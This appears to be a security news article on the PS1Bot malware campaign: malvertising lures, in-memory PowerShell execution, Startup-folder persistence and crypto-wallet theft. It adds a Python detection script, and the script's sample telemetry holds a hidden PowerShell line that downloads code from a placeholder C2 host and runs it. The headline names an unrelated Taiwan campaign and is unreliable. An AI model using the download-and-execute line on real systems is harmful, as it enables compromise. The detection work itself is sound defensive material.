Taiwan Servers Compromised by UAT-7237 Using Advanced Custom Tools
A newly identified and sophisticated malware campaign is targeting Windows systems through a multi-stage attack framework named PS1Bot. This framework combines PowerShell and C# modules to execute extensive data theft operations while avoiding conventional detection methods.
The PS1Bot malware represents an advanced shift in cyberattack tactics, using a modular structure and in-memory execution to bypass antivirus tools, maintain long-term access, and minimize traces on infected systems.
Malvertising as the Initial Entry Point
PS1Bot infections are spread through malicious advertising campaigns. Victims are lured into downloading compressed archives with names crafted for search engine optimization, such as:
- chapter 8 medicare benefit policy manual.zip
- Counting Canadian Money Worksheets Pdf.zip

Inside these archives is a JavaScript downloader named FULL DOCUMENT.js, which starts the infection chain by fetching further malicious components from attacker-controlled servers.
Modular Capabilities for On-Demand Attacks
The malware’s modular design allows threat actors to deploy specific tools when needed, including:
- Information stealers
- Keyloggers
- Screen capture utilities
- Persistence mechanisms
Cisco Talos reports that PS1Bot activity has been ongoing throughout 2025, with fresh samples emerging regularly, signaling active development and refinement.

Stealth Through In-Memory Execution
Unlike traditional malware, PS1Bot avoids leaving a significant footprint on disk. It uses PowerShell’s Invoke-Expression (IEX) to execute malicious code directly in memory, making detection by signature-based security solutions far less likely.
Persistence and Evasion Strategy
PS1Bot’s persistence method involves creating randomly named PowerShell scripts inside the %PROGRAMDATA% directory, paired with malicious shortcut (.LNK) files placed in the Windows Startup folder. These shortcuts automatically trigger the malware after each system reboot.
The persistence module downloads obfuscated payloads from the C2 server’s /transform endpoint. The payload is then decoded, saved as a .ps1 script, and executed — repeating the same communication and infection process indefinitely.
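The persistence chain and the IEX-driven in-memory execution described in this section leave a recognisable shape in endpoint telemetry: a PowerShell process whose command line pairs Invoke-Expression with a download cradle, a .ps1 created directly under %PROGRAMDATA%, and a .LNK created in the per-user Startup folder. The following detection logic is an added example written for this article, not Cisco Talos code or PS1Bot code; the event records are constructed Sysmon-style dictionaries, and every hostname, path and URL in them is made up.

```python
"""Hunt for the PS1Bot-style persistence and in-memory execution pattern in
endpoint telemetry. Added illustration, not Cisco Talos code; event shapes are
Sysmon-like (EventID 1 = ProcessCreate, 11 = FileCreate) but constructed, and
all hostnames, paths and URLs are invented."""
import math
import re
from collections import defaultdict

# Indicators taken from the write-up: IEX executing downloaded code, a randomly
# named .ps1 dropped in the %PROGRAMDATA% root, and a .LNK in the Startup folder.
IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
CRADLE_RE = re.compile(
    r"downloadstring|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|net\.webclient", re.I)
PROGDATA_PS1_RE = re.compile(r"^c:\\programdata\\[^\\]+\.ps1$", re.I)  # file sits in the root itself
STARTUP_LNK_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.I)


def shannon_entropy(text: str) -> float:
    """Bits per character of the script name; random-looking names score high."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def detect_ps1bot_indicators(events):
    """Return one finding per matched rule plus a correlated persistence_chain
    finding when a host shows both file drops."""
    findings = []
    rules_per_host = defaultdict(set)

    def add(rule, host, detail):
        findings.append({"rule": rule, "host": host, "detail": detail})
        rules_per_host[host].add(rule)

    for ev in events:
        host = ev["Host"]
        if ev["EventID"] == 1:  # ProcessCreate: look for IEX fed by a download cradle
            cmd = ev.get("CommandLine", "")
            if IEX_RE.search(cmd) and CRADLE_RE.search(cmd):
                add("iex_download_cradle", host, cmd)
        elif ev["EventID"] == 11:  # FileCreate: script drop or Startup shortcut
            path = ev.get("TargetFilename", "")
            if PROGDATA_PS1_RE.match(path):
                stem = path.rsplit("\\", 1)[-1][:-4]
                add("programdata_ps1", host,
                    f"{path} (name entropy {shannon_entropy(stem):.2f} bits)")
            elif STARTUP_LNK_RE.search(path):
                add("startup_lnk", host, path)

    # Both drops on one host is the persistence mechanism described in the article.
    for host, rules in list(rules_per_host.items()):
        if {"programdata_ps1", "startup_lnk"} <= rules:
            add("persistence_chain", host, "ProgramData .ps1 plus Startup .lnk on the same host")
    return findings


# Constructed sample telemetry (not real data). WS-01 shows the full pattern;
# WS-02 shows benign PowerShell and ProgramData activity that must not alert.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Host": "WS-01", "Image": PS,
     "CommandLine": 'powershell.exe -nop -w hidden -c "IEX (iwr http://c2.invalid/transform -UseBasicParsing)"'},
    {"EventID": 11, "Host": "WS-01", "Image": PS, "TargetFilename": r"C:\ProgramData\qz7kx3p1.ps1"},
    {"EventID": 11, "Host": "WS-01", "Image": PS,
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qz7kx3p1.lnk"},
    {"EventID": 1, "Host": "WS-02", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"EventID": 11, "Host": "WS-02", "Image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "TargetFilename": r"C:\Users\bob\Documents\budget.docx"},
    {"EventID": 11, "Host": "WS-02", "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetFilename": r"C:\ProgramData\Vendor\installer-log.txt"},
]

if __name__ == "__main__":
    for f in detect_ps1bot_indicators(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['host']}: {f['detail']}")
```

The rules are deliberately narrow: `PROGDATA_PS1_RE` only matches scripts dropped in the ProgramData root, not in vendor subfolders, which keeps installer noise out, and the correlated `persistence_chain` finding is what should page an analyst, since either file drop on its own is occasionally legitimate. In a real deployment the same logic maps onto Sysmon Event IDs 1 and 11 or Windows 4688/4663 events, and PowerShell Script Block Logging (Event ID 4104) will additionally capture the decoded script body that IEX executes, which is the artefact a disk-only search would miss.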

The malware creates unique communication URLs using the C: drive’s serial number, enabling tailored tracking of each infected system while concealing operations.
Targeting Cryptocurrency Assets
PS1Bot’s data theft functionality includes scanning for cryptocurrency wallets. It searches the system for recovery phrases, password files, and documents containing seed words in multiple languages. These are then compressed and sent to the attacker’s infrastructure via HTTP POST requests.
Researchers from Cisco Talos also discovered code similarities between PS1Bot and other malware families, such as AHK Bot and tools used in Skitnet campaigns, suggesting possible shared development resources or collaboration among threat actors.